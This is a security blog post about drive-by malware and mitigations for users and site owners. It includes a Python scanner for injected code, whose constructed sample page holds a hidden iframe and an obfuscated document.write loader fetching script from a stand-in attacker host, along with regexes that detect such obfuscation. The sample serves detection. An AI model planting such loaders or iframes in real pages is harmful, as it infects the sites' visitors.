Drive-By Malware

This post identifies preventative measures that both end users and web site managers can take against the dangers of drive-by malware.

Drive-by malware is:

A download which the user may have indirectly authorized by clicking on a link, or by being redirected to a malicious webpage through a misleading link, without understanding the consequences of these actions. For instance, the user could be installing an unknown ActiveX component or Java applet. Any of this could also happen without the user even knowing about it, if the webpage the user goes to has had code injected into it. This happens to legitimate sites far more often than anyone would care to believe.

The damage ensues when the download installs malware by exploiting a bug in the browser, mail reader, another application or the operating system, without any user interaction whatsoever.
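For the web site manager's side of the problem, here is an added example (not from the original post) that scans a page's HTML for the usual signs of injected drive-by code: iframes sized or styled to be invisible, inline script that hides its loader behind encoding or eval, and script pulled from a host the site does not normally use. The allowed host list, the sample page and its hostnames are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Signs of injected drive-by code: an iframe sized or styled to be invisible, and
# inline script that hides what it loads behind encoding or eval.
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(width|height)\s*:\s*0")
OBFUSCATION_RE = re.compile(r"document\.write\s*\(\s*unescape|\beval\s*\(|String\.fromCharCode|%u[0-9a-fA-F]{4}")

class InjectionScanner(HTMLParser):
    def __init__(self, allowed_script_hosts):
        super().__init__()
        self.allowed = set(allowed_script_hosts)  # hosts the site owner expects to serve script
        self.findings = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").lower()
            if a.get("width") == "0" or a.get("height") == "0" or HIDDEN_STYLE_RE.search(style):
                self.findings.append(f"hidden iframe -> {a.get('src')}")
        elif tag == "script":
            self.in_script = True
            host = urlparse(a.get("src") or "").hostname  # None for inline or relative script
            if host and host not in self.allowed:
                self.findings.append(f"script from unlisted host -> {host}")

    def handle_data(self, data):  # script bodies arrive here as one chunk
        if self.in_script and OBFUSCATION_RE.search(data):
            self.findings.append("obfuscated inline script")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

def scan_html(html, allowed_script_hosts=()):
    """Return the findings for one page; an empty list means nothing looked injected."""
    scanner = InjectionScanner(allowed_script_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: a shop page into which a hidden iframe, an obfuscated
# loader and a script from an unlisted host have been injected.
SAMPLE_HTML = """<html><head><script src="https://www.example.com/js/app.js"></script></head>
<body><h1>Welcome</h1><iframe src="http://malicious.example/x.php" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://evil.example/a.js%22%3E%3C/script%3E'));</script>
<script src="http://cdn.unknown.example/t.js"></script></body></html>"""
```

Run `scan_html(SAMPLE_HTML, {"www.example.com"})` to see all three findings; running the same check against a known-good copy of each page is the simplest way to spot an injection early.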

Common occurrences of drive-by downloads happen when a user:

  • Visits a malicious or compromised website.
  • Views an email message containing malicious scripts.
  • Clicks on a link included in an email message.
  • Clicks within a deceptive popup window believing it is a system message or anti-virus program.

Recommended Mitigation Steps

In order of simplicity:

  • Run your computer with the appropriate rights!
    • Admin accounts are for administration.
    • Set up a user account with lower permissions.
  • Use strong passwords for system access and for encryption.
  • Do not use the same password for multiple devices / services.
  • Do not open email from unknown senders.
  • Install and use email reputation tools such as Trend Micro’s eMail-ID tool.  (Still free!)
  • Never click on attachments or links embedded within emails, even when the emails are from friends.  A friend may not realize their machine is infected with malware.
  • Do not go to web sites that could be potentially dangerous.  Use a website reputation filter like Trend Micro’s WebProtection Add-on.  (Still free!)
  • Be careful with what and where you share your personal info. 
  • Install an anti-malware package on every workstation you use.
  • Use a browser with anti-malware/phishing features.
  • Judiciously apply security patches to:
    • Operating system software.
    • Anti-malware software.
    • Browser software.
    • All other application software.
  • At the very least, install a personal firewall in front of any Internet facing computer.
  • Invest in a good, reliable and configurable hardware firewall.
  • Install and use a “sandbox”.  (Sandboxie is still free!)
  • Make use of DNS services to restrict access to known malicious content.  (OpenDNS is still free!)
  • Install and configure a web-content filter product.  (K9 is still free from BlueCoat!)
  • Use access control applications like “DropMyRights” to launch apps with restricted permissions. (Still free!)
  • Do not store unencrypted personal information on a workstation.  Install and use BitLocker (free!), PGP (commercial), Sophos (free!), Trend Micro’s Email Encryption Service (free!) or other encryption products.

In a business environment of any size, set your policies appropriately, install the correct enterprise-level controls based on the above list, and monitor your environment for compliance and attacks with IDS/IPS, policy management, performance management and security management  tools.  Oh yeah, and hire a good consultant…